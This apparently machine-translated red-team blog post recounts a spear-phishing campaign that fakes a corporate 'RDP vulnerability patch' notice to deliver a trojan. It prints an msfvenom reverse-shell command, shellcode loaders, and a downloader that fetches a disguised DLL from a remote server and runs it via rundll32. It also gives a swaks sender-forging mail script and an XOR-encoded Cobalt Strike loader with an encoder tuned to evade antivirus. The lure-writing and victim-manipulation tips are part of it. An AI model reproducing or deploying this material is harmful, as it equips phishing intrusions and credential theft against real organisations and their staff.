Author: Tilting
0x00 Preface
This is an authorized harpoon case. It's also an attempt. It's not rich in experience.
0x01 Harpoon Attack
Harpoon attack is one of the hackers'attacks. The most common way is to use Trojan Horse program as an attachment to e-mail and send a very attractive name to the target computer to induce the victim to open the attachment and infect the Trojan Horse.
0x02 ready to start
After a long time without the shell, he began to attack through the harpoon, hoping to get some harvest.
Ask whether support for such technical means is permitted:
Next, find a colleague to provide material, a customer's email, which contains the email signature, Department name, Logo.
0x03 Making Template
The main contents are as follows:
Title: Shanghai xxx Emergency Reinforcement Notice on Business Network and Office Network Terminal Security
background
Microsoft released a security patch on May 15, 2019 Beijing Time to fix the Remote Code Execution Vulnerability of Windows Remote Desktop Service (RDP) with CVE number CVE-2019-0708. The vulnerability can be triggered remotely without identity authentication, which has great harm and impact.
Affected version
- Windows 7
- Windows Server 2008 R2
- Windows Server 2008
- Windows Server 2003
- Windows XP
Because the vulnerability has the same level of harm as last year's Wannacry extortion virus, it was decided by the Ministry of Information Technology of the head office to implement vulnerability reinforcement patches to ensure that all business and office networks repair vulnerabilities.
Installation mode
Unzip "Shanghai xxxRDP vulnerability patch. zip", unzip password: xxx123, after successful decompression, double-click to run "RDP-VulnPatch.exe":
Successful repair will prompt "Successful repair of vulnerabilities!"
Shanghai xxx
May 20, 2019
The decompressed password is also a common weak password of the target.
0x04 Making Trojan Horse
By manually making a Trojan horse DLL of Windows/shell/reverse_tcp, the shellcode generated by Msfvenom is obtained.
$ /opt/metasploit-framework/bin/msfvenom -p windows/shell/reverse_tcp LHOST=xxxx LPORT=8899 -f c -e x86/shikata_ga_nai -i 20
Use the previous QQ Pinyin input method DLL hijacking loopholes to make a white use.
VOID shdjshjdhsjhdjshdjs() { unsigned char buff[] = "\xbe\x65\x43\x60\x4a\xdb\xcd\xd9\x74\x24\xf4\x58\x31\xc9\xb1" "\xd6\x31\....Ellipsis part.......7\xe7\xc3\x2a\xcd\x23\xb8\x07\x0b\x04\x54\x17" "\xc1\x57\x63\x4c\x60\xa7\x7a\xa7\x54\xe7\xc2"; PVOID p = NULL; if ((p = VirtualAlloc(NULL, sizeof(buff), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL) { printf("error"); } if (!(CopyMemory(p, buff, sizeof(buff)))) { printf("error"); } CODE code = (CODE)p; code(); }
Reference: https://payloads.online/archivers/2018-06-09/1
0x05 Collect Mailbox
In Baidu Library search comes some:
The picture is not posted, so it's troublesome to type.
Write a bash script to send forged mail:
for line in `cat mail` do echo "$line" sed "s/xx@xx.net/${line}/g" data.eml | swaks --to $line --from xx@smtp2go.com --h-From '=?UTF-8?B?xx?= <xx@xx.xx.cn>' --server mail.smtp2go.com -p 2525 -au USER -ap PASS --data - > /tmp/send.log done
data.eml is the translated mail body
The technology can bypass SPF and DKIM detection.
Specific reference: https://payloads.online/archivers/2019-05-09/1
Because it's rebounding cmd for testing, it won't be intercepted by 360
The mail effect is as follows:
0x06 a little harvest
It is confirmed that it is not the customer's machine.
2nd version of 0x07
Because the QQ input method signature loader was used before, when the mouse moves up, it will show the program description information. This is not the result I want, so I started to use the Trojan Horse. .
Development environment:
- Windows 10 x64
- Visual Studio 2015
Test environment:
- Windows 7 x64
- 360 guards
0x08 Trojan Horse Thought
Write a downloader as a vulnerability patch. The Downloader Downloads the DLL module to the server and runs it with Rundll32.
It involves window prompt optimization, program resource information optimization and permission application.
The results are as follows:
Downloader code:
// Win32 Project 5.cpp: Defines the entry point for console applications. // #include "stdafx.h" #include <Windows.h> #include <iostream> #include <UrlMon.h> #pragma comment(lib, "urlmon.lib") using namespace std; HRESULT DownloadFile(PTCHAR URL, PTCHAR File); static TCHAR URL[] = TEXT("http://**.**.**.**:8000/fff.jpeg"); static TCHAR SaveFile[MAX_PATH]; static TCHAR FileName[] = TEXT("\\fff.dll"); // Download File HRESULT DownloadFile(PTCHAR URL, PTCHAR File) { HRESULT hr = URLDownloadToFile(0, URL, File, 0, NULL); return hr; } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow) { ZeroMemory(SaveFile, MAX_PATH); GetEnvironmentVariable(TEXT("TMP"), SaveFile, MAX_PATH); lstrcatW(SaveFile, FileName); if (DownloadFile(URL, SaveFile) != S_OK) { // wprintf(TEXT("Error: %d \n"), GetLastError()); MessageBox(NULL, TEXT("Fix bug failed, please check the network, whether can connect to Microsoft server!"), TEXT("Shanghai xxx"), MB_ICONWARNING | MB_OK); return 0; } lstrcatW(SaveFile, TEXT(",rundll32dllfun")); TCHAR opt[MAX_PATH]; ZeroMemory(opt, MAX_PATH); lstrcatW(opt, TEXT(" ")); lstrcatW(opt, SaveFile); PROCESS_INFORMATION pi; STARTUPINFO si = { sizeof(si) }; si.cb = sizeof(si); si.wShowWindow = TRUE; CreateProcess( TEXT("C:\\Windows\\System32\\rundll32.exe"), opt, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); cout << GetLastError() << endl; MessageBox(NULL, TEXT("Successful bug repair!"), TEXT("Shanghai xxx"), MB_OK | MB_ICONINFORMATION); return 0; }
Code for fff.jpeg:
// Win32 Project 6.cpp: Defines the export function of the DLL application. // #include "stdafx.h" #include "Win32Project6.h" typedef void(_stdcall *CODE)(); // This is an example of exporting variables WIN32PROJECT6_API int nWin32Project6=0; extern "C" _declspec(dllexport) void __cdecl rundll32dllfun(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine,int nCmdShow) { unsigned char buf[] = "\xbf\xaa\x57\x39\xb0\xda\xdd\xd9\x74\x24\xf4\x58\x29\xc9\xb1" "\xd6\x83\xe8\xfc\x31\x78\x10\x03\x78\x10\x48\xa2\x81\x35\xa2" "\x82\x9c\xef\x7f\xc5\x15\x34\x8b\xad\xe6\xfd\xc2\x9d\x38\xbd" "\x31\x21\x78\x54\xba\xce\x82\xb4\xcc\xe5\x68\x8e\x22\x28\xd7" "\x06\x8c\x96\x0a\x7b\xed\x44\xf0\x94\x65\x0e\xa4\x3b\x2e\xcb" "\xe7\x17\x60\xaf\x1d\xa4\x57\x1f\xb1\xf3\x01\x31\x5c\x6a\x97" "\xf...ellipsis..."; PVOID p = NULL; p = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (p != NULL) { memcpy(p, buf, sizeof(buf)); CODE code = (CODE)p; code(); } return; }
Among them, extern "C" _declspec (dllexport) void cdecl rundll32dllfun is a fixed function definition format which conforms to the loading of rundll32.
When the Trojan Horse runs, it creates rundll32.exe in the process list, which is a system file.
UAC
In order to get higher privileges for Trojans, I opened the Administrator Privilege Application:
Click is:
Successful repair is prompted, and then the program closes.
At the same time, a dll file is generated on the local machine:
There will also be an additional rundll 32 in the process, 360 will not intercept:
There will be more logs for servers that provide downloads on the server side:
0x09 Send Mail
More than 200 email addresses were collected through http://www.skymem.info, and a script was written:
It's estimated that we'll be running all night. Let's see the harvest tomorrow. If there's any, keep writing.
0x10 Upgrade Trojan Horse
The first edition is a failure. We should pay more attention to visual perception, such as icons and logo s, suggesting that the file is credible and that other programs should not be used as loaders to achieve killer-free effect. If the second edition of Trojan Horse goes as the first edition, I think the success rate is 80%.
But I think it's too bad to use rebound cmd. Trojan horses need to look good.
So, the Trojan Horse began to be transformed, the downloader file remains unchanged, just need to update the server fff.jpeg DLL, because each run, will download the DLL, and then use rundll32 call.
I want to make it cobaltstrike online, bypass Windows Defender basically no problem, both to ensure that the previous mail Trojan is available, but also to ensure that new code updates.
Rewrite rundll32dllfun:
fff.jpeg:
extern "C" _declspec(dllexport) void __cdecl rundll32dllfun(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) { CHAR cpu_code[] = "\xf5\xe1\x80\x09\x09\x09\x69\x80\xec\x38\xdb\x6d\x82\x5b\x39\x82\x5b\x05\x82\x5b\x1d\x82\x7b\x21...Ellipsis part....\x3e\x38\x27\x38\x30\x27\x38\x3d\x3d\x27\x3f\x30\x09\x09\x09\x09\x09"; DWORD dwCodeLength = sizeof(cpu_code); DWORD dwOldProtect = NULL; for (DWORD i = 0; i < dwCodeLength; i++) { cpu_code[i] ^= 9; } PVOID pCodeSpace = VirtualAlloc(NULL, dwCodeLength, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if (pCodeSpace != NULL) { CopyMemory(pCodeSpace, cpu_code, dwCodeLength); Sleep(200); VirtualProtect(pCodeSpace, dwCodeLength, PAGE_EXECUTE, &dwOldProtect); CODE coder = (CODE)pCodeSpace; HANDLE hThread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)coder, NULL, 0, NULL); WaitForSingleObject(hThread, INFINITE); } return; }
Here we use XOR decoding shellcode, virtual memory page property adjustment and thread creation to execute shellcode, bypassing 90% of the software.
The advantage of creating threads is that you can call WaitForSingleObject to make the shell code execute before the process exits.
Several debugging times, the process has finished executing the shellcode and has not yet run, using WaitForSingleObject to solve this problem
A XOR script has been written for this purpose:
import sys from argparse import ArgumentParser, FileType def process_bin(num, src_fp, dst_fp): shellcode = '' shellcode_size = 0 try: while True: code = src_fp.read(1) if code == '': break base10 = ord(code) ^ num code_hex = hex(base10) code_hex = code_hex.replace('0x','') if(len(code_hex) == 1): code_hex = '0' + code_hex shellcode += '\\x' + code_hex shellcode_size += 1 src_fp.close() dst_fp.write(shellcode) dst_fp.close() return shellcode_size except Exception as e: sys.stderr.writelines(str(e)) def main(): parser = ArgumentParser(prog='Shellcode X', description='[XOR The Cobaltstrike PAYLOAD.BINs] \t > Author: rvn0xsy@gmail.com') parser.add_argument('-v','--version',nargs='?') parser.add_argument('-s','--src',help=u'source bin file',type=FileType('rb'), required=True) parser.add_argument('-d','--dst',help=u'destination shellcode file',type=FileType('w+'),required=True) parser.add_argument('-n','--num',help=u'Confused number',type=int, default=90) args = parser.parse_args() shellcode_size = process_bin(args.num, args.src, args.dst) sys.stdout.writelines("[+]Shellcode Size : {} \n".format(shellcode_size)) if __name__ == "__main__": main()
Generate a payload.bin:
Select raw:
Use effect:
The generated file shellcode can be compiled directly into the source code.
2/70 Achievements:
https://www.virustotal.com/#/file/576281eabe371ce01e3e23048652e878022144eca9696bf1dbf7741bd6e30c86/detection
Microstep Online:
https://s.threatbook.cn/report/file/576281eabe371ce01e3e23048652e878022144eca9696bf1dbf7741bd6e30c86/?env=win7_sp1_enx64_office2013
None of the 0/25 wins were killed:
After updating fff.jpeg, I just need to wait for the new machine on cobaltstrike...
Just keep sending it.
0x11 Cobaltstrike Spear Phish
Cobaltstrike already has the ability to forge emails, and no longer has to remember swaks commands.
Reference: https://cobaltstrike.com/help-spear-phish
To make smtp2go bypass the spf check, fill in xx@smtp2go.com in Bunce to
These two days my samples were insanely analyzed by sandbox:
But that's normal.
0x12 summary
Actually fishing:
- Gather more information
- Adding more target-related information to attachments to reduce psychological defense
- If you think about it more, you will understand.
- More psychological cues (Trojan horse icons, program descriptions, UAC?)
- Widespread netting
- Trojan horses must be reliable
- White utilization seems to be only suitable for maintaining permissions
There are so many cheaters on the Internet and anti-cheating education. Why do people always get hooked? If 100 people don't, there will always be 10,000.
Applications with UAC attributes will have a shield on them, and some users mistakenly believe that it is secure.